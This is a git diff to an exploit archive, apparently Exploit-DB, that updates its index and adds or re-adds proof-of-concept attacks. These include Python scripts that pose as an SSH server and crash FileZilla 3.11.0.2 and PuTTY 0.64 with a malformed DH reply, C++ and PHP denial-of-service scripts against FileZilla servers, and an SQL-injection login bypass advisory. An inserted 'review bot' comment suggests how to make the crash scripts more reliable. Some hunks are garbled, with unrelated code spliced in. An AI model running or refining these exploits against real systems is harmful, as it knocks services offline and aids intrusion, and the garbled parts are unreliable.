diff --git a/files.csv b/files.csv
index 6a80d0627..3dcdb5d51 100755
--- a/files.csv
+++ b/files.csv
@@ -1110,7 +1110,7 @@ id,file,description,date,author,platform,type,port
 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0
 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143
 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80
-1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
+1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0
 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0
 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0
@@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port
 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
-2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
+2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0
@@ -2588,7 +2588,7 @@ id,file,description,date,author,platform,type,port
 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0
 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0
 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
-2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
+2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
@@ -23371,7 +23371,7 @@ id,file,description,date,author,platform,type,port
 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0
 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0
 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0
-26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
+26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0
 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0
 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0
@@ -33455,7 +33455,7 @@ id,file,description,date,author,platform,type,port
 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0
 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
-37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve _/bin/sh_ - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
+37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ - shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
@@ -33629,7 +33629,7 @@ id,file,description,date,author,platform,type,port
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
-37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80
+37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
@@ -33639,7 +33639,7 @@ id,file,description,date,author,platform,type,port
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
-37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
+37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@@ -33649,3 +33649,6 @@ id,file,description,date,author,platform,type,port
 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
+37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
+37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
+37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
diff --git a/platforms/php/webapps/37290.txt b/platforms/php/webapps/37290.txt
new file mode 100755
index 000000000..7c95f7730
--- /dev/null
+++ b/platforms/php/webapps/37290.txt
@@ -0,0 +1,46 @@ +<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +| Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability | +| Date: 06.13.2015 | +| Exploit Daddy: Walid Naceri | +| Vendor Homepage: http://milw0rm.sourceforge.net/ | +| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | +| Version: v1.0 | +| Tested On: Kali Linux, Mac, Windows | +|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| +| Website exploiter: WwW.security-Dz.Com | +| CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA | +| Sorry: Sorry pancaker, you missed that one :( | +<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> + + + + +### vuln codez admin/login.php ### + -#include "Winsock2.h" - -#define BUFFSIZE 10000 -#define ATTACK_BUFFSIZE 5000 - -using namespace std; - -int _tmain(int argc, _TCHAR* argv[]) -{ - cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl; - cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." 
<< endl; - if (argc!=3) // Exit if wrong number of arguments - { - cerr << "Error: Wrong number of arguments" << endl; - cout << "Usage: " << argv[0] << " " << endl; - cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl; - return (-1); - } - - in_addr IPAddressData; - __int64 counterVal; - char* bufferData; - char* attackStringData; - SOCKET sock; - sockaddr_in sinInterface; - - WSADATA wsaData; - int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2 - if (iResult != NO_ERROR) - { - cerr << "Error: WSAStartup() failed" << endl; - return(-1); - } - - int recvRet; - char tmpBuffer[BUFFSIZE]; - char tmpAttackBuffer[ATTACK_BUFFSIZE]; - tmpAttackBuffer[0] = 'U'; - tmpAttackBuffer[1] = 'S'; - tmpAttackBuffer[2] = 'E'; - tmpAttackBuffer[3] = 'R'; - tmpAttackBuffer[4] = ' '; - - int i; - int j=5; - for (i=j;i +#include "Winsock2.h" + +#define BUFFSIZE 10000 +#define ATTACK_BUFFSIZE 5000 + +using namespace std; + +int _tmain(int argc, _TCHAR* argv[]) +{ + cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl; + cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." 
<< endl; + if (argc!=3) // Exit if wrong number of arguments + { + cerr << "Error: Wrong number of arguments" << endl; + cout << "Usage: " << argv[0] << " " << endl; + cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl; + return (-1); + } + + in_addr IPAddressData; + __int64 counterVal; + char* bufferData; + char* attackStringData; + SOCKET sock; + sockaddr_in sinInterface; + + WSADATA wsaData; + int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2 + if (iResult != NO_ERROR) + { + cerr << "Error: WSAStartup() failed" << endl; + return(-1); + } + + int recvRet; + char tmpBuffer[BUFFSIZE]; + char tmpAttackBuffer[ATTACK_BUFFSIZE]; + tmpAttackBuffer[0] = 'U'; + tmpAttackBuffer[1] = 'S'; + tmpAttackBuffer[2] = 'E'; + tmpAttackBuffer[3] = 'R'; + tmpAttackBuffer[4] = ' '; + + int i; + int j=5; + for (i=j;i MOV BYTE PTR [ESI+7C],01 - ---------------------------------------------------------------- - -07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled) - ---------------------------------------------------------------- - Exception C0000005 (ACCESS_VIOLATION writing [0000007C]) - ---------------------------------------------------------------- - EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? - EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00 - ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? - EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00 - ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00 - EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? - ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? - EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? 
- EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05 - --> MOV BYTE PTR [ESI+7C],01 - ---------------------------------------------------------------- - -07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477 -07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477 -07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477 -07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477 -07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477 -07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477 - -*/ - -?> - -# milw0rm.com [2006-12-09] + MOV BYTE PTR [ESI+7C],01 + ---------------------------------------------------------------- + +07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled) + ---------------------------------------------------------------- + Exception C0000005 (ACCESS_VIOLATION writing [0000007C]) + ---------------------------------------------------------------- + EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? + EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00 + ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? + EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00 + ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00 + EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? + ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? + EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? 
+ EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05 + --> MOV BYTE PTR [ESI+7C],01 + ---------------------------------------------------------------- + +07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477 +07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477 +07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477 +07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477 +07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477 +07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477 + +*/ + +?> + +# milw0rm.com [2006-12-09] diff --git a/platforms/windows/dos/2914.php b/platforms/windows/dos/2914.php index c239ffe41..b33caba79 100755 --- a/platforms/windows/dos/2914.php +++ b/platforms/windows/dos/2914.php @@ -1,67 +1,67 @@ - - -# milw0rm.com [2006-12-11] + + +# milw0rm.com [2006-12-11] diff --git a/platforms/windows/dos/37286.py b/platforms/windows/dos/37286.py new file mode 100755 index 000000000..25c23cee3 --- /dev/null +++ b/platforms/windows/dos/37286.py 
@@ -0,0 +1,71 @@
+'''
+# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
+# Date: 5-6-2015
+# Vendor homepage: http://www.chiark.greenend.org.uk
+# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
+# Version: 3.11.0.2
+# Author: 3unnym00n
+
+# Details:
+# --------
+# sftp module for filezilla based on putty's psftp component.
+# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash
+
+# Tested On: win7, xp
+# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
+
+'''
+
+
+import socket
+import struct
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+
+## do banner exchange
+## send server banner
+client.send('SSH-2.0-SUCK\r\n')
+## recv client banner
+client_banner = ''
+while True:
+    data = client.recv(1)
+    if data == '\x0a':
+        break
+    client_banner += data
+
+print 'the client banner is: %s'%client_banner.__repr__()
+
+## do key exchange
+## recv client algorithms
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send server algorithms
+client.send('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'.decode('hex'))
+
+
+## do dh key exchange
+## recv dh group exchange request
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send dh group exchange group
+client.send('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'.decode('hex'))
+
+## recv dh group exchange init
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+
+## send dh group exchange reply
+dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
+dh_gex_reply_msg += '\x09' ## padding len
+dh_gex_reply_msg += '\x21' ## dh gex reply
+dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
+dh_gex_reply_msg += 'A'*600
+
+client.sendall(dh_gex_reply_msg)
+
diff --git a/platforms/windows/dos/37291.py b/platforms/windows/dos/37291.py
new file mode 100755
index 000000000..dd96a585d
--- /dev/null
+++ b/platforms/windows/dos/37291.py
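Review bot: The Details block in 37286.py describes the trigger only as "a malformed dh group exchange reply", while the bytes assembled at the end of the hunk show the actual inconsistency — the field commented `## dh host key len` is `\x00\x00\xff\xff` (65535) inside a packet whose `## pl` field is `\x00\x00\x02\x3c` (572) and which is followed by just 600 bytes of payload — so the header should say so, e.g. `# trigger: the inner host-key length (0xffff) exceeds the outer packet length (0x23c); a client must bound every inner length by the packet length`, which is also the condition a protocol-aware sensor could alert on. The same applies to 37291.py, whose header likewise omits that both scripts are Python 2 only (`print` statement, `str.decode('hex')`) and that binding 127.0.0.1:22 needs elevated privileges on Unix-like hosts outside the tested Windows setups; 37286.py's `Vendor homepage` additionally points at the PuTTY site rather than FileZilla's. Separately, each `client.recv(4)` / `struct.unpack('>I', str_pl)` / `client.recv(pl)` triple assumes a single `recv` returns the full count; a short read raises `struct.error` or leaves the packet framing desynchronised, so the reads should loop until the expected length arrives, as sketched below for both files.
```python
def recv_exact(sock, n):
    # recv() may return fewer bytes than asked; keep reading until n arrive
    buf = ''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError('client closed the connection mid-exchange')
        buf += chunk
    return buf

# ... unchanged: banner exchange ...
## recv client algorithms
pl = struct.unpack('>I', recv_exact(client, 4))[0]
recv_exact(client, pl)
# ... unchanged: the other two recv pairs change the same way ...
```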
@@ -0,0 +1,70 @@
+'''
+# Exploit title: putty v0.64 denial of service vulnerability
+# Date: 5-6-2015
+# Vendor homepage: http://www.chiark.greenend.org.uk
+# Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe
+# Version: 0.64
+# Author: 3unnym00n
+
+# Details:
+# --------
+# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash
+
+# Tested On: win7, xp
+# operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh root@127.0.0.1
+
+'''
+
+
+import socket
+import struct
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+
+## do banner exchange
+## send server banner
+client.send('SSH-2.0-paramiko_1.16.0\r\n')
+## recv client banner
+client_banner = ''
+while True:
+    data = client.recv(1)
+    if data == '\x0a':
+        break
+    client_banner += data
+
+print 'the client banner is: %s'%client_banner.__repr__()
+
+## do key exchange
+## recv client algorithms
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send server algorithms
+client.send('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'.decode('hex'))
+
+
+## do dh key exchange
+## recv dh group exchange request
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send dh group exchange group
+client.send('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'.decode('hex'))
+
+## recv dh group exchange init
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+
+## send dh group exchange reply
+dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
+dh_gex_reply_msg += '\x09' ## padding len
+dh_gex_reply_msg += '\x21' ## dh gex reply
+dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
+dh_gex_reply_msg += 'A'*600
+
+client.sendall(dh_gex_reply_msg)
+